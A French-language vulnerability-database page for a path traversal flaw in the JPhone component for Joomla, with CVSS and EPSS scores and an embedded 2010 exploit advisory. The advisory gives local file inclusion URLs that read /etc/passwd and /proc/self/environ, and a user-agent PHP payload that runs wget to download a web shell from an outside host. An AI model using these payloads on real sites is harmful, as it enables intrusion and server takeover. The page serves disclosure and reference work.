CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
4.19%
–
–
2022-04-03
–
–
4.19%
–
–
2022-07-17
–
–
4.19%
–
–
2023-03-12
–
–
–
0.95%
–
2023-03-19
–
–
–
0.94%
–
2023-07-02
–
–
–
0.83%
–
2024-02-11
–
–
–
0.83%
–
2024-03-10
–
–
–
0.83%
–
2024-06-02
–
–
–
0.83%
–
2024-11-17
–
–
–
0.83%
–
2024-12-22
–
–
–
0.83%
–
2025-02-02
–
–
–
0.81%
–
2025-03-16
–
–
–
0.97%
–
2025-01-19
–
–
–
0.83%
–
2025-02-02
–
–
–
0.81%
–
2025-03-18
–
–
–
–
0.21%
2025-03-30
–
–
–
–
0.51%
2025-04-06
–
–
–
–
0.51%
2025-04-15
–
–
–
–
0.51%
2025-04-15
–
–
–
–
0.51,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2010-09-09 22h00 +00:00 Auteur : Chip d3 bi0s EDB Vérifié : Yes
JPhone 1.0 Alpha 3 Component Joomla Local File Inclusion
=========================================================================================
- Discovered by : Chip D3 Bi0s
- Email : chipdebios[at]gmail[dot]com
- Group : LatinHackTeam
- Date : 2010-09-10
- Where : From Remote
-------------------------------------------------------------------------------------
Affected software description
Application : Jphone
Developer : Urs Kobald
Compatibility : 1.0 Alpha 3
License : GPLv2 or later
Date Added : 14 Aug 2010
website : http://www.4you-studio.com
Download : http://www.joomlafrance.org/telecharger/download/Jphone/344bbad81cf491b6e5215e3f15fc3fb7.html
I. BACKGROUND
Called Jphone, component agency 4you studio allows for your Joomla adapted mobile
version with a real interface using page transition effects rather pro
(the cube effect and popup are very nice).
Consisting of a component and a plugin for Joomla, it is after activating the plugin
define a menu (the menu management of Joomla). This is to link the specific component
to display your content. Currently seen by the articles, categories, sections are set
but also those contacts and links Web (Two native Joomla components).
The installation procedure is shown in the download package.
In addition, the proposed version is an alpha version
(therefore usable only for testing purposes) but resulted entirely in French.
Feel free to share your opinion on the forum.
Support for Android and PalmPre should be functional (not tested)
II. DESCRIPTION
Some Local File inclusion vulnerabilities exist in Component Joomla Jphone 1.0 Alpha 3.
III. ANALYSIS
The bug is in the following files, specifying the lines
/components/com_jphone/jphone.php
[63] if($controller = JRequest::getVar('controller')) {
[64]
[65] require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');
Explanation:As noted in the line [65] $controller
nowhere is filtered, which result is lfi as is known to pass '.php' use %00 :)
IV. EXPLOITATION
http://site/path/index.php?option=com_jphone&controller={LFI}
{LFI}=../../../../../../../../../../etc/passwd%00
{LFI}=../../../../../../../../../../proc/self/environ%00
changing the user agent for something so:
<?system('wget http://chipdebios.com/r57.txt -O r57.php');?>
A special greeting to my good friends:
F3l0m4n, R4y0k3nt, ecore, J3h3s, r0i & pc Marquesita :)
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++